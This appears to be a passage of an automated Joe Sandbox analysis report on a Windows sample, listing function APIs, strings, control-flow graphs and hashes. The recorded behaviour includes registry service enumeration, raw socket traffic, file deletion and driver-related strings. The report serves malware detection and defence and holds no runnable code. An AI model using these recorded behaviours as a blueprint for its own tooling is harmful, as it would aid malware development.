                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FindResource
                                                                                                                                      • String ID: VZi
                                                                                                                                      • API String ID: 1635176832-1018002537
                                                                                                                                      • Opcode ID: e244395a267a100d17203beb7ce24a211166db16df014656c03a3f1ae40f9c9b
                                                                                                                                      • Instruction ID: ddd61f8723f16f5ef02e737d38d013dc67a7dc8196dbf3e48b1e692b2b855d49
                                                                                                                                      • Opcode Fuzzy Hash: e244395a267a100d17203beb7ce24a211166db16df014656c03a3f1ae40f9c9b
                                                                                                                                      • Instruction Fuzzy Hash: F0D05B26B141203BE551550EBE45ABB73ACCFC6635F09802EF8C9DA140D3749C47A6F1
                                                                                                                                      Function 0045BB70 Relevance: 3.4, Strings: 2, Instructions: 939COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Y$F$Y$F
                                                                                                                                      • API String ID: 0-1120252294
                                                                                                                                      • Opcode ID: 097a9f0ce272bc686273bd711f40d2d37ef9787a62ff6eb0b30dbd0ed7852258
                                                                                                                                      • Instruction ID: da4a7fcf1a21f8aab8013937411b2df5d26ecd1bf63363459626a46f7d6f13af
                                                                                                                                      • Opcode Fuzzy Hash: 097a9f0ce272bc686273bd711f40d2d37ef9787a62ff6eb0b30dbd0ed7852258
                                                                                                                                      • Instruction Fuzzy Hash: 85A2DC75E00219CFDB18CF98C895AADBBB2FF88305F248159D8056B396D738AD46CF94
                                                                                                                                      Function 00442160 Relevance: 3.0, APIs: 2, Instructions: 30nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00442182
                                                                                                                                      • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 0044219A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                      • Opcode ID: a2457c5162b46e017b4866e5c8f016cf5fbbf62ee773db67eaf54ed4fc66212e
                                                                                                                                      • Instruction ID: 66bfb58a2d8f9b80cec4beb3eb40f53b09a6dda95348cbdb1f0cbfb3807f0bea
                                                                                                                                      • Opcode Fuzzy Hash: a2457c5162b46e017b4866e5c8f016cf5fbbf62ee773db67eaf54ed4fc66212e
                                                                                                                                      • Instruction Fuzzy Hash: C2F0D4B6204108FBDB04CF98DD84CAB77B9EB8C300B50C60AFA1A87240C674E911DBA9
                                                                                                                                      Function 00471D29 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c177f8609b339ecbe862d69e2495b09fce394341426c75eee8bc4092b284b0e5
                                                                                                                                      • Instruction ID: 4eb1b7e5b0b14256c9f96a7f09eb1c58fbe95cfa2428a73c17f68c319ccb7173
                                                                                                                                      • Opcode Fuzzy Hash: c177f8609b339ecbe862d69e2495b09fce394341426c75eee8bc4092b284b0e5
                                                                                                                                      • Instruction Fuzzy Hash: 50F01C36001619FBCF325E999D048EB3B6DEF48360B00C416FA1D55131C739D921EFAA
                                                                                                                                      Function 0040ED70 Relevance: 1.4, APIs: 1, Instructions: 107COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 88f4bbea43a871ede60ae5f7869206e6215579d89ef79aa8273d0bba383732a2
                                                                                                                                      • Instruction ID: 68b89c2be7630618c982e24102c2af2f24506509a24b99f21cfa7c5ca11ebf5c
                                                                                                                                      • Opcode Fuzzy Hash: 88f4bbea43a871ede60ae5f7869206e6215579d89ef79aa8273d0bba383732a2
                                                                                                                                      • Instruction Fuzzy Hash: 6931673120A3565BE711962ADC05A6B7B559F82314F040C7BE880EB2C2D77DDC65C799
                                                                                                                                      Function 69E827D0 Relevance: 47.6, APIs: 8, Strings: 19, Instructions: 322COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E826F0: _strncpy.LIBCMT ref: 69E8274F
                                                                                                                                        • Part of subcall function 69E826F0: _memset.LIBCMT ref: 69E82765
                                                                                                                                        • Part of subcall function 69E826F0: _sprintf.LIBCMT ref: 69E8277F
                                                                                                                                      • _memset.LIBCMT ref: 69E82BCA
                                                                                                                                      • _sprintf.LIBCMT ref: 69E82BDA
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82BF1
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E82C0B
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E82C12
                                                                                                                                      • _malloc.LIBCMT ref: 69E82C2D
                                                                                                                                      • _memset.LIBCMT ref: 69E82C3F
                                                                                                                                      • _sprintf.LIBCMT ref: 69E82C6E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset_sprintf$DebugOutputString$__wfopen_s_malloc_strncpy
                                                                                                                                      • String ID: i$$i$,i$0i$8i$<i$C:\pl.txt$Di$Hi$Pi$Ti$`i$current i : %d$li$total dlq type count : %d$xi$i$i$i
                                                                                                                                      • API String ID: 376268990-4014833909
                                                                                                                                      • Opcode ID: 4a8a4f6a7504682e7162a2ca26c9639c7558678d70e430026783ff93989aec90
                                                                                                                                      • Instruction ID: 7f73f1e0a5ddefba95a010ab5179385c0aadab3a5b1e29439fc8045bb5ec8f30
                                                                                                                                      • Opcode Fuzzy Hash: 4a8a4f6a7504682e7162a2ca26c9639c7558678d70e430026783ff93989aec90
                                                                                                                                      • Instruction Fuzzy Hash: 32B108B478070027F6059A908D6BF2A75884B65B88F20943CEB492F3C5DEF5AD0663DF
                                                                                                                                      Function 00464E50 Relevance: 39.0, APIs: 20, Strings: 2, Instructions: 477COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 113 464e50-464ec4 _memset * 3 call 46c8a0 116 464ec6-464ef0 _strlen call 4989fc 113->116 117 464f11-464fbe _strlen call 4989fc 113->117 124 464ef4-464f0e _memset 116->124 125 464ef2 116->125 122 464fd0-464fdf 117->122 123 464fc0 call 4659e0 117->123 127 465000-465011 122->127 128 464fe1-464fe8 122->128 129 464fc5-464fc7 123->129 124->117 125->117 132 465306-46530d 127->132 133 465017 127->133 130 464ff6-464ffa 128->130 131 464fea-464ff4 128->131 129->122 134 464fc9 129->134 130->127 135 4655c3-4655d1 call 494e64 130->135 131->127 131->130 132->135 136 465313-46531d 132->136 137 465021-46512d _memset call 464d80 _memset _strlen * 2 _strncpy call 447a40 133->137 134->122 139 465327-4653e8 _memset call 464d80 _memset call 466900 call 447a40 136->139 149 46515f-465166 137->149 150 46512f-465136 137->150 159 46541a-465421 139->159 160 4653ea-4653f1 139->160 153 465172-4651ba call 4660e0 call 4630c0 149->153 154 465168 149->154 150->149 152 465138-46514e 150->152 156 465155 152->156 157 465150 152->157 173 4651bc-4651d3 153->173 174 4651d8-4651fe _memset call 46c8a0 153->174 154->153 161 4652fe-465300 156->161 157->132 164 465423 159->164 165 46542d-465473 call 4660e0 call 4630c0 159->165 160->159 163 4653f3-465409 160->163 161->132 161->137 167 465410 163->167 168 46540b 163->168 164->165 180 465475-46548c 165->180 181 465491-4654b7 _memset call 46c8a0 165->181 171 4655bb-4655bd 167->171 168->135 171->135 171->139 182 4652ef-4652fb call 4957cb 173->182 183 465204-46522e _strlen call 4989fc 174->183 184 4652e2-4652ee 174->184 192 4655ac-4655b8 call 4957cb 180->192 193 46559f-4655ab 181->193 194 4654bd-4654e8 _strlen call 4989fc 181->194 182->161 195 465234-4652a7 DeleteFileA 183->195 196 4652d3-4652da 183->196 184->182 192->171 193->192 206 465590-46559c 194->206 207 4654ee-46550a 194->207 214 4652c7-4652d1 195->214 215 4652a9-4652bf call 467c00 195->215 201 4652e0 196->201 201->182 206->192 212 46550c-465519 207->212 213 46551b-46555a _memset _strlen _strncpy 207->213 216 46555d-465564 212->216 213->216 214->201 221 4652c4 215->221 218 465566-465581 call 467c00 216->218 219 465584-46559d 216->219 218->219 219->192 221->214
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$_strlen$_strncpy
                                                                                                                                      • String ID: .rar$gamePluginCtrl.rar
                                                                                                                                      • API String ID: 1556359711-1647869409
                                                                                                                                      • Opcode ID: 8bea8b0d0cd7f83b49fca7595b16617fc98c8325c5c844685a93a79f18cbf1a3
                                                                                                                                      • Instruction ID: 60d4e7bc3ff31de23a463674653626c65a76e25bdb2790cddcbde59691fead48
                                                                                                                                      • Opcode Fuzzy Hash: 8bea8b0d0cd7f83b49fca7595b16617fc98c8325c5c844685a93a79f18cbf1a3
                                                                                                                                      • Instruction Fuzzy Hash: 0512B5B1D04218ABDF20DB54DC45FDE77B8AB5130CF0481E9E50D66282EB799B88CF96
                                                                                                                                      Function 69E91920 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 285networkCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 225 69e91920-69e91990 call 69ec3c70 * 2 call 69e8c140 232 69e91b14-69e91b16 225->232 233 69e91996-69e919a8 socket 225->233 235 69e91c97-69e91caf call 69ebe9d7 232->235 233->232 234 69e919ae-69e91a2e htons inet_addr call 69ec3c70 htons * 2 233->234 240 69e91a31-69e91a36 234->240 240->240 241 69e91a38-69e91a55 call 69ebe9f0 240->241 244 69e91a58-69e91a5d 241->244 244->244 245 69e91a5f-69e91a71 244->245 246 69e91a73-69e91a76 245->246 247 69e91aa4-69e91aae 245->247 249 69e91a78-69e91a81 246->249 250 69e91a83 246->250 248 69e91ab0-69e91ab5 247->248 248->248 251 69e91ab7-69e91adc htons * 2 248->251 252 69e91a84-69e91a8a 249->252 250->252 254 69e91ae0-69e91ae5 251->254 253 69e91a90-69e91a95 252->253 253->253 255 69e91a97-69e91aa2 253->255 254->254 256 69e91ae7-69e91b0b sendto 254->256 255->246 255->247 257 69e91b1b-69e91b41 recvfrom 256->257 258 69e91b0d-69e91b0e closesocket 256->258 257->258 259 69e91b43-69e91b5f htons 257->259 258->232 260 69e91b8c-69e91b9b htons 259->260 261 69e91b61 259->261 260->258 262 69e91ba1 260->262 263 69e91b63-69e91b67 261->263 264 69e91c8c-69e91c93 closesocket 262->264 265 69e91ba7 262->265 266 69e91b69 263->266 267 69e91b77-69e91b8a 263->267 264->235 268 69e91bab-69e91bb5 265->268 269 69e91b70-69e91b75 266->269 267->260 267->263 270 69e91bbb 268->270 271 69e91c56-69e91c5b 268->271 269->267 269->269 273 69e91bc0-69e91bc4 270->273 271->268 272 69e91c61-69e91c66 271->272 272->264 274 69e91c68-69e91c6f 272->274 275 69e91bc9-69e91bd1 273->275 276 69e91bc6-69e91bc7 273->276 277 69e91c70-69e91c75 274->277 278 69e91bd3 275->278 279 69e91bd6-69e91be1 htons 275->279 276->273 277->277 280 69e91c77-69e91c89 call 69ebe9f0 277->280 278->279 281 69e91bfe-69e91c08 279->281 282 69e91be3-69e91bfc htons 279->282 280->264 285 69e91c0a-69e91c1a 281->285 286 69e91c1c-69e91c3f call 69ebeff0 281->286 284 69e91c52 282->284 284->271 288 69e91c42-69e91c4a 285->288 286->288 288->284
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: htons$_memset$_strncpyclosesocket$Startupinet_addrrecvfromsendtosocket
                                                                                                                                      • String ID: %d.%d.%d.%d
                                                                                                                                      • API String ID: 3966461804-3491811756
                                                                                                                                      • Opcode ID: b03114f282520343244d23b350348eec70da35154ce10997680e35f0f6653e35
                                                                                                                                      • Instruction ID: 5a26542088ac445ccdb59544c63042eee5c9cf80a15a9da73961439603ae102b
                                                                                                                                      • Opcode Fuzzy Hash: b03114f282520343244d23b350348eec70da35154ce10997680e35f0f6653e35
                                                                                                                                      • Instruction Fuzzy Hash: A0A1EF71518381AFC321CF68C885BEBBBE9BF8A308F10495DE489CB241E771D509CB92
                                                                                                                                      Function 69E86CD0 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 196registryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services,00000000,00020019,?), ref: 69E86D07
                                                                                                                                      • _memset.LIBCMT ref: 69E86D42
                                                                                                                                      • _memset.LIBCMT ref: 69E86D5C
                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 69E86D78
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 69E86D9C
                                                                                                                                      • RegQueryValueExA.KERNEL32(?,Group,00000000,?,?,?), ref: 69E86DC7
                                                                                                                                      • _memset.LIBCMT ref: 69E86E1C
                                                                                                                                      • _memset.LIBCMT ref: 69E86E3A
                                                                                                                                      • _sprintf.LIBCMT ref: 69E86E54
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$Open$EnumQueryValue_sprintf
                                                                                                                                      • String ID: 369369$Altitude$Group$SYSTEM\CurrentControlSet\services$SYSTEM\CurrentControlSet\services\%s\Instances\%s Instance$System Reserved
                                                                                                                                      • API String ID: 103941440-232118669
                                                                                                                                      • Opcode ID: f88583be8562e4b9a14a11a707249c20c79b8d962071eceeaf21eb5322a6df5c
                                                                                                                                      • Instruction ID: 46c369e6ab2537196be64d569cea919d8abb15906b0146c5307b47fae08a1558
                                                                                                                                      • Opcode Fuzzy Hash: f88583be8562e4b9a14a11a707249c20c79b8d962071eceeaf21eb5322a6df5c
                                                                                                                                      • Instruction Fuzzy Hash: 72518FB1118345AFD311DF64CE85EABB7ECEBC9748F50891DF58983141E734EA098BA2
                                                                                                                                      Function 00463E90 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 262COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 327 463e90-463eb0 call 469d30 IWBE 330 463eb2-463ec6 327->330 331 463ecb-463ed3 IHJDE 327->331 332 464332-46433f call 494e64 330->332 333 463ed5-463ee9 331->333 334 463eee-463f0b call 476512 INSHDY 331->334 333->332 339 463f26-463f41 call 463de0 call 4665a0 334->339 340 463f0d-463f21 334->340 345 463f97-463f9e call 466530 339->345 346 463f43-463f92 339->346 340->332 350 463fe3-46402c 345->350 351 463fa0-463fe1 345->351 347 464032-464165 _memset * 3 call 4658f0 call 495ea0 call 4665a0 346->347 359 464167-464191 347->359 360 464193-4641ba 347->360 350->347 351->347 363 4641bd-4641d3 call 4646c0 359->363 360->363 365 4641d8-4641fc INSHD 363->365 366 464202-46420d 365->366 367 4642c8-46432f _memset * 2 GSDNP call 466970 365->367 371 4642c6 366->371 372 464213-46421a 366->372 367->332 371->332 372->371 374 464220-464227 372->374 374->371 375 46422d-46428c _memset * 2 GSDNP call 466340 374->375 378 46428e-46429a 375->378 379 46429b-4642c0 call 4646c0 HINSD 375->379 378->379 379->371
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4595660079.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_401000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .sys$SysWOW64$loser$loser32$loser64$system32
                                                                                                                                      • API String ID: 0-916340778
                                                                                                                                      • Opcode ID: 6eb1c1beeea7209bc2243ce68aa2d824260f4391e8815bc3b3d1a9208e934a98
                                                                                                                                      • Instruction ID: 84629b88827b0d896196d29f6756208a7261883dd08502f1f4a3a1c3096fd4bd
                                                                                                                                      • Opcode Fuzzy Hash: 6eb1c1beeea7209bc2243ce68aa2d824260f4391e8815bc3b3d1a9208e934a98
                                                                                                                                      • Instruction Fuzzy Hash: 87C1A570C042A8D9EF21D764DC49BDDBBB86B25708F0400DAE54C66282E7BD5BC8CF66
                                                                                                                                      Function 69E820D0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 122windowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E820F8
                                                                                                                                      • _sprintf.LIBCMT ref: 69E8211F
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82133
                                                                                                                                      • OutputDebugStringA.KERNEL32(?), ref: 69E8214D
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E82154
                                                                                                                                      • MessageBoxA.USER32(00000000,69EDE1F8,69EDE1E0,00001000), ref: 69E8218D
                                                                                                                                      • MessageBoxA.USER32(00000000,69EDE1F8,69EDE1E0,00001000), ref: 69E821A0
                                                                                                                                      • MessageBoxA.USER32(00000000,69EDE1F8,69EDE1E0,00001000), ref: 69E821B3
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E821C4
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1AC), ref: 69E821DC
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E821E3
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E82205
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE18C), ref: 69E82219
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E82220
                                                                                                                                      • __wfopen_s.LIBCMT ref: 69E8223E
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1BC), ref: 69E82252
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDE1DC), ref: 69E82259
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DebugOutputString$__wfopen_s$Message$_memset_sprintf
                                                                                                                                      • String ID: C:\pl.txt$SetExeVerInfo : guaType: %d, bFree: %d, exeVerNum: %d
                                                                                                                                      • API String ID: 1459224498-3464333151
